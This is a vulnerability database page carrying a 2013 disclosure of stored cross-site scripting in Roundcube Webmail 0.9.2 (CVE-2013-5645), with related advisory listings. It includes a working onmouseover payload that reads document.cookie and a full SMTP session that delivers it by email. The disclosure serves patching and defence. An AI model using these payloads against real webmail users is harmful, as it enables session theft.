Vulners
Lucene search
Roundcube Webmail 0.9.2 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | CVE-2013-5645 | 29 Aug 201312:07 | – | attackerkb |
 | CVE-2013-5645 | 29 Aug 201310:00 | – | cve |
 | CVE-2013-5645 | 29 Aug 201310:00 | – | cvelist |
 | CVE-2013-5645 | 29 Aug 201310:00 | – | debiancve |
 | EUVD-2013-5485 | 7 Oct 202500:30 | – | euvd |
 | Mandriva Linux Security Advisory : roundcubemail (MDVSA-2013:226) | 6 Sep 201300:00 | – | nessus |
| openSUSE Security Update : roundcubemail (openSUSE-SU-2013:1420-1) | 13 Jun 201400:00 | – | nessus |
 | Updated roundcubemail package fixes security vulnerability | 3 Sep 201319:50 | – | mageia |
 | CVE-2013-5645 | 29 Aug 201312:07 | – | nvd |
 | Roundcube Webmail < 0.9.3 Multiple XSS Vulnerabilities | 2 Sep 201900:00 | – | openvas |
10
`* Roundcube Webmail 0.9.2 XSS Vulnerability
* ========================================================
*
* Site: http://www.roundcube.net
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================
Report-Timeline:
----------------
2013-07-18: Reported on Roundcube Track system (#1489251)
Introduction:
-------------
Roundcube webmail is a browser-based multilingual IMAP client
with an application-like user interface. It provides full
functionality you expect from an e-mail client, including
MIME support, address book, folder manipulation, message
searching and spell checking.
Description:
------------
i've found a XSS Vulnerability inside the "identity" configuration page.
Into the "Sign" textarea, enabling HTML Sign, i've click on "HTML" button
on the editor and i've write this HTML code:
test<b onmouseover="alert(document.cookie)">asd</b>
once you save it, when you move your mouse on the word "asd", the
JavaScript "alert(document.cookie)" will be executed by the client. Every
time you visit the "identity configuration page" the XSS is active.
when you save the new "html sign" and write a new html mail, the
XSS is still present and when you move your mouse over the sign, the
JavaScript XSS code will be executed by the client (see the attachments).
This Vulnerability is also present when the end user, receiving a mail
with this kind of "malicious" javascript code, clicks on "edit as new"
button. After click on it, the JavaScript will be executed by the client.
Exploit mail (tested by telnet on my MTA):
------------------------------------------
HELO foobar.it
MAIL FROM: [email protected]
RCPT TO: [email protected]
DATA
From: Jesus <[email protected]>
To: [email protected]
Subject: test
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset="iso-8859-1"
hey pope, edit this mail as new,
and send it to all your friends!
<b onmouseover=alert(document.cookie)>put your mouse over here</b>
.
Screenshot XSS Vulnerability:
-----------------------------
http://goo.gl/akomO
http://goo.gl/jpp83
CREDITS:
---------
This vulnerabilities has been discovered
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jul 2013 00:00Current
8.7High risk
Vulners AI Score8.7
EPSS0.0188